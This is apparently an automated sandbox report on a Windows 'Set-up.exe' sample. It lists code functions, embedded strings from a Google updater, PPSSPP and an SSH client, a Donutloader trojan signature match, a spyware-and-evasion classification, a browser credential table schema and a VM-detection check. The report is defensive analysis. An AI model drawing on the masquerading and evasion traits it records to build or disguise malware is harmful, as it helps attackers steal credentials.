          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054A14580_2_054A1458
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0548B46A0_2_0548B46A
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054B24680_2_054B2468
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0548F4380_2_0548F438
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054B27180_2_054B2718
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0548E7E80_2_0548E7E8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054866DE0_2_054866DE
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547F6D80_2_0547F6D8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054A81480_2_054A8148
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0548F1180_2_0548F118
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547F1F80_2_0547F1F8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054950680_2_05495068
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054700000_2_05470000
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054A83A80_2_054A83A8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054B02480_2_054B0248
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054752280_2_05475228
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054A8D080_2_054A8D08
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05492D280_2_05492D28
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05476DD80_2_05476DD8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05472DE50_2_05472DE5
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05472C5C0_2_05472C5C
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05485C650_2_05485C65
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0549BC780_2_0549BC78
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05473CC90_2_05473CC9
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05486CB80_2_05486CB8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054B2CB80_2_054B2CB8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054AFF880_2_054AFF88
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05476E680_2_05476E68
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547BE680_2_0547BE68
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547EED80_2_0547EED8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547CEE80_2_0547CEE8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054A2EB80_2_054A2EB8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054B29D80_2_054B29D8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547B9D00_2_0547B9D0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547D9F80_2_0547D9F8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054809980_2_05480998
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054798480_2_05479848
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0548D8500_2_0548D850
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054728780_2_05472878
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0548FB480_2_0548FB48
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05472B8A0_2_05472B8A
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05472B910_2_05472B91
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547CA580_2_0547CA58
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05472AEF0_2_05472AEF
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054ABAF80_2_054ABAF8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059174900_2_05917490
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F54400_2_058F5440
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059214400_2_05921440
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F43ED0_2_058F43ED
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05905D600_2_05905D60
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05920BF00_2_05920BF0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E55F00_2_058E55F0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EA5F00_2_058EA5F0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E156D0_2_058E156D
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E55600_2_058E5560
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059014B00_2_059014B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0590A4000_2_0590A400
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E24510_2_058E2451
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059037F80_2_059037F8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0591E7100_2_0591E710
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059116400_2_05911640
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058ED6600_2_058ED660
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EB6700_2_058EB670
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EC1800_2_058EC180
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EB1E00_2_058EB1E0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EF1200_2_058EF120
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EA1580_2_058EA158
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059211600_2_05921160
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E10000_2_058E1000
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E13E40_2_058E13E4
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E13190_2_058E1319
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E13120_2_058E1312
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0591A2800_2_0591A280
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FE2D00_2_058FE2D0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E12770_2_058E1277
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FFCD00_2_058FFCD0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F0CFC0_2_058F0CFC
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FBFD80_2_058FBFD8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E7FD00_2_058E7FD0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FCF700_2_058FCF70
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05920EA00_2_05920EA0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F4E660_2_058F4E66
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EDE600_2_058EDE60
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058ED9800_2_058ED980
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E39B00_2_058E39B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0591E9D00_2_0591E9D0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FD8A00_2_058FD8A0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059168D00_2_059168D0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FDBC00_2_058FDBC0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0590FBE00_2_0590FBE0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F9BF20_2_058F9BF2
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05916B300_2_05916B30
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05905AF40_2_05905AF4
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E43A10 appears 122 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E5E110 appears 53 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 058ECC50 appears 51 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E51600 appears 34 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E44630 appears 315 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0547E4C8 appears 43 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 011196A1 appears 46 times
          Source: Set-up.exeStatic PE information: invalid certificate
          Source: Set-up.exeStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
          Source: Set-up.exeStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
          Source: Set-up.exe, 00000000.00000003.1829704509.00000000066E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePPSSPP.exe. vs Set-up.exe
          Source: Set-up.exe, 00000000.00000000.1701749914.00000000017B5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameupdater.exe> vs Set-up.exe
          Source: Set-up.exe, 00000000.00000000.1701749914.00000000017B5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUpdaterSetup.exeB vs Set-up.exe
          Source: Set-up.exe, 00000000.00000003.1829704509.000000000639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameupdater.exe> vs Set-up.exe
          Source: Set-up.exe, 00000000.00000003.1829704509.000000000639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdaterSetup.exeB vs Set-up.exe
          Source: Set-up.exeBinary or memory string: OriginalFilenameupdater.exe> vs Set-up.exe
          Source: Set-up.exeBinary or memory string: OriginalFilenameUpdaterSetup.exeB vs Set-up.exe
          Source: Set-up.exeBinary or memory string: OriginalFilenamePPSSPP.exe. vs Set-up.exe
          Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: Set-up.exeBinary string: BNtQueryObject()\Device\Mup\\Device\VBoxMiniRdr\ :\Device\LanmanRedirector\\Device\WebDavRedirector\GetFinalPathNameByHandle().tmp\\?\ :\\?\GLOBALROOTNtSetInformationFile(FileRenameInformation)SetFileInformationByHandle(FileDispositionInfo)SetFileInformationByHandle(FileRenameInfo)NtSetInformationFile(FileDispositionInformation)QtBytes: data is outside of the specified objectQtVect[Quantum]QtOutPort[Quantum]QtOutPort[QtBytes]QtBytesQuantumQtVect[QtBytes]QtBytes, in QtBytes::Encode()QtVectS[QtBytes] bytes
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@4/2
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E4C7F0 GetLastError,FormatMessageW,SetLastError,0_2_00E4C7F0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E8C970 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,PathIsPrefixW,Process32NextW,PathIsPrefixW,GetLastError,__CxxThrowException@8,0_2_00E8C970
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05917490 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,0_2_05917490
          Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Set-up.exe, 00000000.00000003.1863626522.000000000639B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863047400.00000000063B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: Set-up.exeReversingLabs: Detection: 31%
          Source: Set-up.exeString found in binary or memory: CSshClient::CliCommonParam::GetKeypairFile::KeypairImporterInterface::GetPassphraseCould not import the keypair specified with -: passphrase in - is invalid.: a passphrase needs to be provided using -Importing keypair specified with - parameter failed: parameter value; try -help for more information.globalparameteropensshputtyprefersupport parameter value; expecting 'p' to prefer, 's' to support, or 'n' to not use. parameter value: expecting IPv4 and/or IPv6 interface.The file is too big.lowhigh parameter value; expecting numeric value or 'Default'. parameter value is too ; using the est valid value instead. parameter value; expecting 'r' to require or 's' to support.Invalid host parameter; malformed host part.Invalid host parameter; empty host part.Invalid host parameter; malformed port part. parameter was received from the internet. Only safe parts of the profile will be loaded. If you trust this profile, open it in the graphical SSH Client to unblock it, or open the file's Properties in Windows File Explorer and select Unblock.It appears the profile specified using the - parameter are not supported: algorithms specified with -Loading profile specified with - parameter failed: Profile file: Importing host keys specified with -Unreferenced socks4socksv4socks5socksv5httphttpconnectssh parameter value: nested SSH jump proxy connections are not supported. parameter value; expecting 'SOCKS4', 'SOCKS5', or 'HTTP'.'HTTP', or 'SSH'.=SSH parameter cannot be used without the -: cannot be used with proxy server disabled: can only be used with a proxy server enabled: cannot be used with a SOCKSv4 proxy server: cannot be used with an SSH jump proxy server: can only be used with an SSH jump proxy server parameter has failed: Reason: If this client is being run under a different Windows account than the one that generated the keypair, export the keypair into a file and use the - prevents global client keys from loading.The use of Unable to add client key.licensed to This license is good for business and government use.
          Source: Set-up.exeString found in binary or memory: (display usage information)-help-usage(displays help page by page)-help | more(creates a text file you can open e.g. with Notepad)-help > h.txt(display help for parameters in general)-help-params(display help for a particular parameter)-help-<param>(display examples)-help-examples(display return codes)-help-codes-help-params | more, try:
          Source: Set-up.exeString found in binary or memory: p\E ( value. and Unrecognized -The - parameter value must be a number between ]checkinstallqueryignoreUpgradeAccesslatestqueryConfigkillautoUpdatesconfigmachineWideupdateCheckDelayHoursMissing -BvSshUpdate parameter., -BvSshUpdate must be run elevated and with administrative rights to apply machine-wide update settings. or -At least one of the - parameters must be provided.hours|Checks if a newer version of the SSH Client is available.y|nApplies an update as specified by other parameters.Shows the result of the last successful check for updates.Specifies to apply the latest recommended update.Specifies the version number of the update to apply.Specifies to apply the latest available update.Specifies to apply the latest strongly recommended update.Terminates other SSH Client processes before starting the update. The update will require this parameter to start if any other processes are running.If the SSH Client is activated using a purchased license, forces the selected update to be applied, even if the update requires a new activation code with extended upgrade access. The upgrade will cause the SSH Client to revert to free of charge license terms.Applies update settings as specified by other provided parameters.Shows currently configured update settings.Configures the update check delay (in hours). If not specified, the currently effective value is preserved.Configures automatic update behavior. If not specified, the currently effective value is preserved.a scriptable update managerUse 'y' to set update settings globally for all Windows accounts, 'n' to use per-user settings. If not specified, update settings will remain machine-wide if they are currently machine-wide, or per-user if they are currently per-user. OR ) OR] OR(- [-] [- OR OR -] [-Installs the latest available recommended update. Upgrade access restrictions may apply if using a purchased license.BvSshUpdate -checkInstalls the latest strongly recommended update even if the current installation is activated using a purchased SSH Client license and the current activation code does not have upgrade access to the latest strongly recommended update.BvSshUpdate -install -recommendedInstalls the update with version <v> if it is available. Upgrade access restrictions may apply if using a purchased license.BvSshUpdate -install -stronglyRecommended -ignoreUpgradeAccessInstalls the update with version <v> even if the current installation is activated using a purchased SSH Client license, and the current activation code does not have upgrade access to the selected version.BvSshUpdate -install -version=<v>Installs the latest available update. Upgrade access restrictions may apply if using a purchased license. If any other SSH Client processes are running, they will be terminated before applying the update.BvSshUpdate -install -version=<v> -ignoreUpgradeAccessShows currently effective update settings.BvSshUpdate -install -latest -killDisables automatic updates for all users.BvSshUpdate -queryConfi
          Source: Set-up.exeString found in binary or memory: http://support.google.com/installer/
          Source: Set-up.exeString found in binary or memory: ..\..\chrome\updater\app\app_install_win.ccUpdate success.No updates.Updater error: http://support.google.com/installer/%s?product=%s&error=%d installation completed: error category[], error_code[], extra_code1[], completion_message[], post_install_launch_command_line[]oemSetOemInstallState failedStoreRunTimeEnrollmentToken failed
          Source: Set-up.exeString found in binary or memory: https://dl.google.com/update2/installers/icons/
          Source: Set-up.exeString found in binary or memory: Fhttps://update.googleapis.com/service/update2/jsonhttps://clients2.google.com/cr/reporthttps://m.google.com/devicemanagement/data/apihttps://dl.google.com/update2/installers/icons/enterprise_companion.mojom.EnterpriseCompanionReceive mojo replyReceive mojo message
          Source: Set-up.exeString found in binary or memory: Try '%ls --help' for more information.
          Source: Set-up.exeString found in binary or memory: Try '%ls --help' for more information.
          Source: Set-up.exeString found in binary or memory: --help display this help and exit
          Source: Set-up.exeString found in binary or memory: --help display this help and exit
          Source: Set-up.exeString found in binary or memory: partition_alloc/address_space
          Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
          Source: Set-up.exeString found in binary or memory: asennuksen: $1oError sa pag-install: Nag-apply ang administrator ng network mo ng Group Policy na pumipigil sa pag-install: $1
          Source: Set-up.exeString found in binary or memory: Tapos na ang pag-install.
          Source: Set-up.exeString found in binary or memory: Kanselahin ang Pag-install
          Source: Set-up.exeString found in binary or memory: Error sa pag-install: $1
          Source: Set-up.exeString found in binary or memory: isvaatimuksia.fHindi na-install dahil hindi natutugunan ng iyong computer ang mga minimum na requirement sa hardware.mL'installation a
          Source: Set-up.exeString found in binary or memory: Inihinto ang Pag-install.
          Source: Set-up.exeString found in binary or memory: $1-installeerder
          Source: Set-up.exeString found in binary or memory: $1-Installationsprogramm
          Source: Set-up.exeString found in binary or memory: $1-installatieprogramma
          Source: Set-up.exeString found in binary or memory: $1-installasjonsprogram
          Source: Set-up.exeString found in binary or memory: .:Asennusvirhe: Asennusprosessin aloittaminen ei onnistunut.?Error sa pag-install: Hindi nagsimula ang proseso ng installer.GErreur d'installation
          Source: Set-up.exeString found in binary or memory: .LAsennusvirhe: Asennusohjelmaa ei suoritettu loppuun. Asennus on keskeytetty.LError sa pag-install: Hindi natapos ang installer. Na-abort ang pag-install.tErreur d'installation
          Source: Set-up.exeString found in binary or memory: Ini-install...
          Source: Set-up.exeString found in binary or memory: 3Asennus ei ole valmis. Haluatko varmasti perua sen?IHindi nakumpleto ang pag-install. Sigurado ka bang gusto mong kanselahin?9Installation non termin
          Source: Set-up.exeString found in binary or memory: uudelleen.#Hindi na-install. Pakisubukan ulit.,
          Source: Set-up.exeString found in binary or memory: isen virheen takia.FHindi na-install dahil sa isang internal na error sa server ng update.Q
          Source: Set-up.exeString found in binary or memory: ei tueta.OError sa pag-install: Invalid o hindi sinusuportahan ang filename ng installer.fErreur d'installation
          Source: Set-up.exeString found in binary or memory: ivityspalvelimella ei ole tiivistedataa sovelluksesta.\Hindi na-install dahil walang anumang data ng hash para sa application ang server ng update.p
          Source: Set-up.exeString found in binary or memory: n versiota ei tueta.QHindi na-install dahil hindi sinusuportahan ang bersyong ito ng operating system.ZL'installation a
          Source: Set-up.exeString found in binary or memory: maassa.AHindi na-install dahil pinaghihigpitan ang access sa bansang ito.=L'installation a
          Source: Set-up.exeString found in binary or memory: Ituloy ang Pag-install
          Source: Set-up.exeString found in binary or memory: Nakansela ang pag-install.
          Source: Set-up.exeString found in binary or memory: n.\Salamat sa pag-install. Dapat mong i-restart ang lahat ng iyong browser bago gamitin ang $1.eMerci d'avoir install
          Source: Set-up.exeString found in binary or memory: n.SSalamat sa pag-install. Dapat mong i-restart ang iyong browser bago gamitin ang $1.aMerci d'avoir install
          Source: Set-up.exeString found in binary or memory: n.TSalamat sa pag-install. Dapat mong i-restart ang iyong computer bago gamitin ang $1.aMerci d'avoir install
          Source: Set-up.exeString found in binary or memory: .4Asennus ei onnistu, palvelin ei tunnista sovellusta.9Hindi na-install, hindi kilala ng server ang application.=Installation impossible. Le serveur ne reconna
          Source: Set-up.exeString found in binary or memory: onnistui, koska protokollaa ei tueta.BHindi na-install dahil sa error na hindi sinusuportahang protocol.K
          Source: Set-up.exeString found in binary or memory: si Windows-versiota ei tueta.IHindi na-install dahil hindi sinusuportahan ang iyong bersyon ng Windows.V
          Source: Set-up.exeString found in binary or memory: Naghihintay sa pag-install...
          Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Set-up.exeStatic file information: File size 14085344 > 1048576
          Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x380400
          Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x154a00
          Source: Set-up.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x5d0000
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Temp\BuildTemp\1.18_Windows_BUILD\ppsspp\PPSSPPWindows.pdb source: Set-up.exe
          Source: Binary string: D:\repos\main\SSH2\Release\pdbs\BvSshUpdate.pdb source: Set-up.exe
          Source: Binary string: updater.exe.pdb source: Set-up.exe
          Source: Binary string: D:\Temp\BuildTemp\1.18_Windows_BUILD\ppsspp\PPSSPPWindows.pdb& source: Set-up.exe
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E323B0 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,GetLastError,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,LoadLibraryW,GetProcAddress,GetProcAddress,VerSetConditionMask,VerSetConditionMask,GetLastError,FreeLibrary,SetLastError,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,0_2_00E323B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E57798 push esi; ret 0_2_00E577A0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01119FF6 push ecx; ret 0_2_0111A009
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054961AF push ecx; ret 0_2_054961B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05904937 push ecx; ret 0_2_05904938
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E4EAD0 InterlockedCompareExchange,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InterlockedExchange,SwitchToThread,0_2_00E4EAD0
          Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\Desktop\Set-up.exeSystem information queried: FirmwareTableInformationJump to behavior
